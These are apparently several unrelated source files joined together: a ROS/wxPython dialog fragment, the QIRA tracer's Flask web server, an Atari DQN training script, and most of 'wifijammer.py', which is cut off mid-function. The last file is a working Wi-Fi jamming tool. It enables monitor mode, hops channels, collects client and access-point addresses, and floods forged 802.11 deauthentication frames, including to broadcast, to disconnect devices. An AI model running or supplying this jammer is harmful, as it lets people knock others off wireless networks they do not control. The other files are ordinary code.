sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.update_filename()
self.klass_msg = ConfigNDTMappingOutput
self.pub = rospy.Publisher('/config/ndt_mapping_output', self.klass_msg, queue_size=10)
def update_filename(self):
tc = self.text_ctrl_path
path = tc.GetValue()
(dn, fn) = os.path.split(path)
now = datetime.datetime.now()
fn = 'aslan-%02d%02d%02d.pcd' % (
now.year % 100, now.month, now.day)
path = os.path.join(dn, fn)
set_path(tc, path)
def OnRef(self, event):
tc = self.text_ctrl_path
file_dialog(self, tc, {'path_type': 'save'})
def OnRadio(self, event):
v = self.radio_btn_filter_resolution.GetValue()
tc = self.text_ctrl_filter_resolution
tc.Enable(v)
def OnPcdOutput(self, event):
tc = self.text_ctrl_filter_resolution
v = tc.GetValue() if self.radio_btn_filter_resolution.GetValue() else '0.0'
msg = self.klass_msg()
msg.filename = self.text_ctrl_path.GetValue()
msg.filter_res = str_to_float(v)
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
class MyDialogWaypointLoader(aslan_gui.MyDialogWaypointLoader):
def __init__(self, *args, **kwds):
self.pdic = kwds.pop('pdic')
self.pdic_bak = self.pdic.copy()
self.gdic = kwds.pop('gdic')
self.prm = kwds.pop('prm')
aslan_gui.MyDialogWaypointLoader.__init__(self, *args, **kwds)
set_size_gdic(self)
parent = self.panel_v
frame = self.GetParent()
self.panel = ParamPanel(parent, frame=frame, pdic=self.pdic, gdic=self.gdic, prm=self.prm)
sizer_wrap((self.panel,), wx.VERTICAL, 1, wx.EXPAND, 0, parent)
self.klass_msg = Bool
self.pub = rospy.Publisher('/config/waypoint_loader_output', self.klass_msg, queue_size=10)
def OnCsvOutput(self, event):
msg = self.klass_msg()
msg.data = True
self.pub.publish(msg)
def OnOk(self, event):
self.panel.detach_func()
self.EndModal(0)
if __name__ == "__main__":
gettext.install("app")
app = MyApp(0)
app.MainLoop()
|
qira_webserver.py
|
from qira_base import *
import qira_config
import os
import sys
import time
import base64
import json
sys.path.append(qira_config.BASEDIR+"/static2")
import model
def socket_method(func):
def func_wrapper(*args, **kwargs):
# before things are initted in the js, we get this
for i in args:
if i == None:
#print "BAD ARGS TO %-20s" % (func.func_name), "with",args
return
try:
start = time.time()
ret = func(*args, **kwargs)
tm = (time.time() - start) * 1000
# print slow calls, slower than 50ms
if tm > 50 or qira_config.WEBSOCKET_DEBUG:
print "SOCKET %6.2f ms in %-20s with" % (tm, func.func_name), args
return ret
except Exception, e:
print "ERROR",e,"in",func.func_name,"with",args
return func_wrapper
import qira_socat
import time
import qira_analysis
import qira_log
LIMIT = 0
from flask import Flask, Response, redirect, request
from flask_socketio import SocketIO, emit
# http://stackoverflow.com/questions/8774958/keyerror-in-module-threading-after-a-successful-py-test-run
import threading
import sys
if 'threading' in sys.modules:
del sys.modules['threading']
import gevent
import gevent.socket
import gevent.monkey
gevent.monkey.patch_all()
# done with that
app = Flask(__name__)
#app.config['DEBUG'] = True
socketio = SocketIO(app)
# ***** middleware moved here *****
def push_trace_update(i):
t = program.traces[i]
if t.picture != None:
#print t.forknum, t.picture
socketio.emit('setpicture', {"forknum":t.forknum, "data":t.picture,
"minclnum":t.minclnum, "maxclnum":t.maxclnum}, namespace='/qira')
socketio.emit('strace', {'forknum': t.forknum, 'dat': t.strace}, namespace='/qira')
t.needs_update = False
def push_updates(full = True):
socketio.emit('pmaps', program.get_pmaps(), namespace='/qira')
socketio.emit('maxclnum', program.get_maxclnum(), namespace='/qira')
socketio.emit('arch', list(program.tregs), namespace='/qira')
if not full:
return
for i in program.traces:
push_trace_update(i)
def mwpoll():
# poll for new traces, call this every once in a while
for i in os.listdir(qira_config.TRACE_FILE_BASE):
if "_" in i:
continue
i = int(i)
if i not in program.traces:
program.add_trace(qira_config.TRACE_FILE_BASE+str(i), i)
did_update = False
# poll for updates on existing
for tn in program.traces:
if program.traces[tn].db.did_update():
t = program.traces[tn]
t.read_strace_file()
socketio.emit('strace', {'forknum': t.forknum, 'dat': t.strace}, namespace='/qira')
did_update = True
# trace specific stuff
if program.traces[tn].needs_update:
push_trace_update(tn)
if did_update:
program.read_asm_file()
push_updates(False)
def mwpoller():
while 1:
time.sleep(0.2)
mwpoll()
# ***** after this line is the new server stuff *****
@socketio.on('forkat', namespace='/qira')
@socket_method
def forkat(forknum, clnum, pending):
global program
print "forkat",forknum,clnum,pending
REGSIZE = program.tregs[1]
dat = []
for p in pending:
daddr = fhex(p['daddr'])
ddata = fhex(p['ddata'])
if len(p['ddata']) > 4:
# ugly hack
dsize = REGSIZE
else:
dsize = 1
flags = qira_log.IS_VALID | qira_log.IS_WRITE
if daddr >= 0x1000:
flags |= qira_log.IS_MEM
flags |= dsize*8
dat.append((daddr, ddata, clnum-1, flags))
next_run_id = qira_socat.get_next_run_id()
if len(dat) > 0:
qira_log.write_log(qira_config.TRACE_FILE_BASE+str(next_run_id)+"_mods", dat)
if args.server:
qira_socat.start_bindserver(program, qira_config.FORK_PORT, forknum, clnum)
else:
if os.fork() == 0:
program.execqira(["-qirachild", "%d %d %d" % (forknum, clnum, next_run_id)])
@socketio.on('deletefork', namespace='/qira')
@socket_method
def deletefork(forknum):
global program
print "deletefork", forknum
os.unlink(qira_config.TRACE_FILE_BASE+str(int(forknum)))
del program.traces[forknum]
push_updates()
@socketio.on('doslice', namespace='/qira')
@socket_method
def slice(forknum, clnum):
trace = program.traces[forknum]
data = qira_analysis.slice(trace, clnum)
print "slice",forknum,clnum, data
emit('slice', forknum, data);
@socketio.on('doanalysis', namespace='/qira')
@socket_method
def analysis(forknum):
trace = program.traces[forknum]
data = qira_analysis.get_vtimeline_picture(trace)
if data != None:
emit('setpicture', {"forknum":forknum, "data":data})
@socketio.on('connect', namespace='/qira')
@socket_method
def connect():
global program
print "client connected", program.get_maxclnum()
push_updates()
@socketio.on('getclnum', namespace='/qira')
@socket_method
def getclnum(forknum, clnum, types, limit):
trace = program.traces[forknum]
ret = []
for c in trace.db.fetch_changes_by_clnum(clnum, LIMIT):
if c['type'] not in types:
continue
c = c.copy()
c['address'] = ghex(c['address'])
c['data'] = ghex(c['data'])
ret.append(c)
if len(ret) >= limit:
break
emit('clnum', ret)
@socketio.on('getchanges', namespace='/qira')
@socket_method
def getchanges(forknum, address, typ, cview, cscale, clnum):
if forknum != -1 and forknum not in program.traces:
return
address = fhex(address)
if forknum == -1:
forknums = program.traces.keys()
else:
forknums = [forknum]
ret = {}
for forknum in forknums:
db = program.traces[forknum].db.fetch_clnums_by_address_and_type(address, chr(ord(typ[0])), cview[0], cview[1], LIMIT)
# send the clnum and the bunch closest on each side
if len(db) > 50:
send = set()
bisect = 0
last = None
cnt = 0
for cl in db:
if cl <= clnum:
bisect = cnt
cnt += 1
if last != None and (cl - last) < cscale:
continue
send.add(cl)
last = cl
add = db[max(0,bisect-4):min(len(db), bisect+5)]
#print bisect, add, clnum
for tmp in add:
send.add(tmp)
ret[forknum] = list(send)
else:
ret[forknum] = db
emit('changes', {'type': typ, 'clnums': ret})
@socketio.on('navigatefunction', namespace='/qira')
@socket_method
def navigatefunction(forknum, clnum, start):
trace = program.traces[forknum]
myd = trace.dmap[clnum]
ret = clnum
while 1:
if trace.dmap[clnum] == myd-1:
break
ret = clnum
if start:
clnum -= 1
else:
clnum += 1
if clnum == trace.minclnum or clnum == trace.maxclnum:
ret = clnum
break
emit('setclnum', {'forknum': forknum, 'clnum': ret})
@socketio.on('getinstructions', namespace='/qira')
@socket_method
def getinstructions(forknum, clnum, clstart, clend):
trace = program.traces[forknum]
slce = qira_analysis.slice(trace, clnum)
ret = []
def get_instruction(i):
rret = trace.db.fetch_changes_by_clnum(i, 1)
if len(rret) == 0:
return None
else:
rret = rret[0]
instr = program.static[rret['address']]['instruction']
rret['instruction'] = instr.__str__(trace, i) #i == clnum
# check if static fails at this
if rret['instruction'] == "":
# TODO: wrong place to get the arch
arch = program.static[rret['address']]['arch']
# we have the address and raw bytes, disassemble
raw = trace.fetch_raw_memory(i, rret['address'], rret['data'])
rret['instruction'] = str(model.Instruction(raw, rret['address'], arch))
#display_call_args calls make_function_at
if qira_config.WITH_STATIC:
if instr.is_call():
args = qira_analysis.display_call_args(instr,trace,i)
if args != "":
rret['instruction'] += " {"+args+"}"
if 'name' in program.static[rret['address']]:
#print "setting name"
rret['name'] = program.static[rret['address']]['name']
if 'comment' in program.static[rret['address']]:
rret['comment'] = program.static[rret['address']]['comment']
if i in slce:
rret['slice'] = True
else:
rret['slice'] = False
# for numberless javascript
rret['address'] = ghex(rret['address'])
try:
rret['depth'] = trace.dmap[i - trace.minclnum]
except:
rret['depth'] = 0
# hack to only display calls
if True or instr.is_call():
#if instr.is_call():
return rret
else:
return None
top = []
clcurr = clnum-1
while len(top) != (clnum - clstart) and clcurr >= 0:
rret = get_instruction(clcurr)
if rret != None:
top.append(rret)
clcurr -= 1
clcurr = clnum
while len(ret) != (clend - clnum) and clcurr <= clend:
rret = get_instruction(clcurr)
if rret != None:
ret.append(rret)
clcurr += 1
ret = top[::-1] + ret
emit('instructions', ret)
@socketio.on('getmemory', namespace='/qira')
@socket_method
def getmemory(forknum, clnum, address, ln):
trace = program.traces[forknum]
address = fhex(address)
dat = trace.fetch_memory(clnum, address, ln)
ret = {'address': ghex(address), 'len': ln, 'dat': dat, 'is_big_endian': program.tregs[2], 'ptrsize': program.tregs[1]}
emit('memory', ret)
@socketio.on('setfunctionargswrap', namespace='/qira')
@socket_method
def setfunctionargswrap(func, args):
function = program.static[fhex(func)]['function']
if len(args.split()) == 1:
try:
function.nargs = int(args)
except:
pass
if len(args.split()) == 2:
abi = None
try:
abi = int(args.split()[0])
except:
for m in dir(model.ABITYPE):
if m == args.split()[0].upper():
abi = model.ABITYPE.__dict__[m]
function.nargs = int(args.split()[1])
if abi != None:
function.abi = abi
@socketio.on('getregisters', namespace='/qira')
@socket_method
def getregisters(forknum, clnum):
trace = program.traces[forknum]
# register names shouldn't be here
# though i'm not really sure where a better place is, qemu has this information
ret = []
REGS = program.tregs[0]
REGSIZE = program.tregs[1]
# 50 is a sane limit here, we don't really need to mark lib calls correctly
cls = trace.db.fetch_changes_by_clnum(clnum+1, 50)
regs = trace.db.fetch_registers(clnum)
for i in range(0, len(REGS)):
if REGS[i] == None:
continue
rret = {"name": REGS[i], "address": i*REGSIZE, "value": ghex(regs[i]), "size": REGSIZE, "regactions": ""}
act = set()
for c in cls:
if c['address'] == i*REGSIZE:
act.add(c['type'])
# this +1 is an ugly hack
if 'R' in act:
rret['regactions'] = "regread"
if 'W' in act:
if "regread" == rret['regactions']:
rret['regactions'] = "regreadwrite"
else:
rret['regactions'] = "regwrite"
rret['num'] = i
ret.append(rret)
emit('registers', ret)
# ***** generic webserver stuff *****
@app.route('/', defaults={'path': 'index.html'})
@app.route('/<path:path>')
def serve(path):
# best security?
if ".." in path:
return
ext = path.split(".")[-1]
try:
dat = open(qira_config.BASEDIR + "/web/"+path).read()
except:
return ""
if ext == 'js' and not path.startswith('client/compatibility/') and path.startswith('client/'):
dat = "(function(){"+dat+"})();"
if ext == 'js':
return Response(dat, mimetype="application/javascript")
elif ext == 'css':
return Response(dat, mimetype="text/css")
else:
return Response(dat, mimetype="text/html")
# must go at the bottom
def run_server(largs, lprogram):
global args
global program
global static
args = largs
program = lprogram
# web static moved to external file
import qira_webstatic
qira_webstatic.init(lprogram)
print "****** starting WEB SERVER on %s:%d" % (qira_config.HOST, qira_config.WEB_PORT)
threading.Thread(target=mwpoller).start()
try:
socketio.run(app, host=qira_config.HOST, port=qira_config.WEB_PORT, log_output=False)
except KeyboardInterrupt:
print "*** User raised KeyboardInterrupt"
exit()
|
Asynchronous.py
|
import random
import numpy as np
import gym
from gym.core import ObservationWrapper
from gym.spaces import Box
import cv2
import atari_wrappers
from framebuffer import FrameBuffer
import torch
import torch.nn as nn
import os
import time
import torch.multiprocessing as mp
from tensorboardX import SummaryWriter
class PreprocessAtariObs(ObservationWrapper):
def __init__(self, env):
"""A gym wrapper that crops, scales image into the desired shapes and grayscales it."""
ObservationWrapper.__init__(self, env)
self.img_size = (1, 64, 64)
self.observation_space = Box(0.0, 1.0, self.img_size)
def _to_gray_scale(self, rgb, channel_weights=[0.8, 0.1, 0.1]):
return (rgb*channel_weights).sum(axis=-1)
def _observation(self, img):
"""what happens to each observation"""
# Here's what you need to do:
# * crop image, remove irrelevant parts
# * resize image to self.img_size
# (use imresize from any library you want,
# e.g. opencv, skimage, PIL, keras)
# * cast image to grayscale
# * convert image pixels to (0,1) range, float32 type
image = img[30:195,6:156]
image = self._to_gray_scale(image)
image = cv2.resize(image,self.img_size[1:],interpolation=cv2.INTER_NEAREST)
image = image.reshape(self.img_size)
image = np.float32(image)/255
return image
def PrimaryAtariWrap(env, clip_rewards=True):
assert 'NoFrameskip' in env.spec.id
# This wrapper holds the same action for <skip> frames and outputs
# the maximal pixel value of 2 last frames (to handle blinking
# in some envs)
env = atari_wrappers.MaxAndSkipEnv(env, skip=4)
# This wrapper sends done=True when each life is lost
# (not all the 5 lives that are givern by the game rules).
# It should make easier for the agent to understand that losing is bad.
env = atari_wrappers.EpisodicLifeEnv(env)
# This wrapper laucnhes the ball when an episode starts.
# Without it the agent has to learn this action, too.
# Actually it can but learning would take longer.
env = atari_wrappers.FireResetEnv(env)
# This wrapper transforms rewards to {-1, 0, 1} according to their sign
if clip_rewards:
env = atari_wrappers.ClipRewardEnv(env)
# This wrapper is yours :)
env = PreprocessAtariObs(env)
return env
def make_env(clip_rewards=True, seed=None):
env = gym.make("BreakoutNoFrameskip-v4") # create raw env
if seed is not None:
env.seed(seed)
env = PrimaryAtariWrap(env, clip_rewards)
env = FrameBuffer(env, n_frames=4, dim_order='pytorch')
return env
class Flatten(nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return x.view(x.size(0), -1)
class DQNAgent(nn.Module):
def __init__(self, state_shape, n_actions, epsilon=0):
super().__init__()
self.epsilon = epsilon
self.n_actions = n_actions
self.state_shape = state_shape
# Define your network body here. Please make sure agent is fully contained here
self.net = nn.Sequential(
nn.Conv2d(state_shape[0], 16, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, (3,3), stride=2),
nn.ReLU(),
Flatten(),
nn.Linear(3136,256),
nn.ReLU(),
nn.Linear(256,n_actions)
)
def forward(self, state_t):
"""
takes agent's observation (tensor), returns qvalues (tensor)
:param state_t: a batch of 4-frame buffers, shape = [batch_size, 4, h, w]
"""
# Use your network to compute qvalues for given state
qvalues = self.net(state_t)
return qvalues
def get_qvalues(self, states):
"""
like forward, but works on numpy arrays, not tensors
"""
model_device = next(self.parameters()).device
states = torch.tensor(states, device=model_device, dtype=torch.float)
qvalues = self.forward(states)
return qvalues.data.cpu().numpy()
def sample_actions(self, qvalues):
"""pick actions given qvalues. Uses epsilon-greedy exploration strategy. """
epsilon = self.epsilon
batch_size, n_actions = qvalues.shape
random_actions = np.random.choice(n_actions, size=batch_size)
best_actions = qvalues.argmax(axis=-1)
should_explore = np.random.choice(
[0, 1], batch_size, p=[1-epsilon, epsilon])
return np.where(should_explore, random_actions, best_actions)
def evaluate(env, agent, n_games=1, greedy=False, t_max=10000):
""" Plays n_games full games. If greedy, picks actions as argmax(qvalues). Returns mean reward. """
rewards = []
for _ in range(n_games):
s = env.reset()
reward = 0
for _ in range(t_max):
qvalues = agent.get_qvalues([s])
action = qvalues.argmax(axis=-1)[0] if greedy else agent.sample_actions(qvalues)[0]
s, r, done, _ = env.step(action)
reward += r
if done:
break
rewards.append(reward)
return np.mean(rewards)
class Net(nn.Module):
def __init__(self, state_shape, n_actions):
super().__init__()
self.conv = nn.Sequential(
nn.Conv2d(state_shape[0], 16, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3,3), stride=2),
nn.ReLU(),
nn.Conv2d(32, 64, (3,3), stride=2),
nn.ReLU(),
Flatten()
)
self.a = nn.Sequential(
nn.Linear(3136,256),
nn.ReLU(),
nn.Linear(256, n_actions)
)
self.v = nn.Sequential(
nn.Linear(3136,256),
nn.ReLU(),
nn.Linear(256, 1)
)
def forward(self,x):
h = self.conv(x)
A = self.a(h)
V = self.v(h)
Q = V + A - torch.mean(A, dim=-1, keepdim=True)
return Q
class DDQNAgent(DQNAgent):
def __init__(self, state_shape, n_actions, epsilon):
super().__init__(state_shape, n_actions, epsilon)
self.net = Net(state_shape,n_actions)
def share_grad(net, shared_net):
for param, shared_param in zip(net.parameters(),shared_net.parameters()):
if param.grad == None:
param.grad = torch.zeros_like(param) # initialization
shared_param._grad = param.grad # reference
def eval(target_agent,T, I_eval, T_max):
writer = SummaryWriter()
T_prev = 0
time_prev = 0
while T.value<T_max:
if (T.value - T_prev) < I_eval:
time.sleep(1)
continue
time_per_iter = (time.time()-time_prev)/(T.value-T_prev)
T_prev = T.value
time_prev = time.time()
clipped_env = make_env(seed = T_prev)
env = make_env(clip_rewards=False,seed = T_prev)
clipped_reward = evaluate(clipped_env,target_agent,n_games=5,greedy=True)
reward = evaluate(env,target_agent,n_games=5,greedy=True)
v0 = np.max(target_agent.get_qvalues([clipped_env.reset()]))
writer.add_scalar('data/clipped_reward', clipped_reward, T_prev)
writer.add_scalar('data/reward', reward, T_prev)
writer.add_scalar('data/v0', v0, T_prev)
writer.add_scalar('data/time_per_iter', time_per_iter, T_prev)
env.close()
clipped_env.close()
writer.close()
def process_train(id, agent, target_agent, T, n_update, I_target,num_steps, T_max, lr, epsilon_decay,gamma):
torch.set_default_tensor_type(next(agent.parameters()).type())
device = next(agent.parameters()).device
env = make_env(seed=id)
s = env.reset()
n_actions = env.action_space.n
state_shape = env.observation_space.shape
np.random.seed(id)
process_agent = DDQNAgent(state_shape, n_actions, epsilon=np.random.uniform(0.7,1)).to(device)
epsilon_min = 10**np.random.uniform(-0.5,-2.2)
share_grad(process_agent, agent)
opt = torch.optim.Adam(agent.parameters(), lr)
scheduler = torch.optim.lr_scheduler.MultiStepLR(opt, milestones=[200000,500000,1000000], gamma=0.3) # lr scheduler
while T.value<T_max:
process_agent.load_state_dict(agent.state_dict())
rewards = []
states = []
actions = []
for _ in range(num_steps):
states.append(s)
qvalues = process_agent.get_qvalues([s])
a = process_agent.sample_actions(qvalues)[0]
s, r, done, _ = env.step(a)
actions.append(a)
rewards.append(r)
process_agent.epsilon = max(epsilon_min, process_agent.epsilon-epsilon_decay)
if done:
s = env.reset()
break
with T.get_lock():
T.value += len(states)
R = []
if done:
R.append(0)
else:
a_max = np.argmax(process_agent.get_qvalues([s]))
R.append(target_agent.get_qvalues([s])[0,a_max])
states = torch.tensor(states)
Q = process_agent(states)[range(len(actions)), actions]
for _ in range(len(rewards)):
r = rewards.pop()
R.append(r + gamma*R[-1])
R = torch.tensor(R[-1:0:-1])
loss = torch.mean((R-Q)**2)
loss.backward()
nn.utils.clip_grad_norm_(process_agent.parameters(), 20)
opt.step()
opt.zero_grad()
scheduler.step()
if T.value//I_target > n_update.value:
with n_update.get_lock():
n_update.value += 1
target_agent.load_state_dict(agent.state_dict())
if __name__ == '__main__':
mp.set_start_method('spawn')
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = "3"
env = make_env()
n_actions = env.action_space.n
state_shape = env.observation_space.shape
env.close()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
gamma = 0.99
num_processes = 8
num_steps = 5
T_max = int(1e7)
I_eval = 20000
I_target = 15000
lr = 1e-4
epsilon_decay = 5e-5
agent = DDQNAgent(state_shape, n_actions, epsilon=0).to(device)
target_agent = DDQNAgent(state_shape, n_actions, epsilon=0).to(device)
target_agent.load_state_dict(agent.state_dict())
agent.share_memory()
target_agent.share_memory()
processes = []
T = mp.Value('I', 0)
n_update = mp.Value('I', 0)
p = mp.Process(target=eval, args=(target_agent,T, I_eval, T_max))
p.start()
processes.append(p)
for id in range(1, num_processes):
p = mp.Process(target=process_train, args=(id, agent, target_agent, T, n_update, I_target,num_steps, T_max, lr, epsilon_decay,gamma))
p.start()
processes.append(p)
for p in processes:
p.join()
torch.save(agent.state_dict(), str(T_max)+".state_dict")
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
if args.skip == pkt.addr2:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
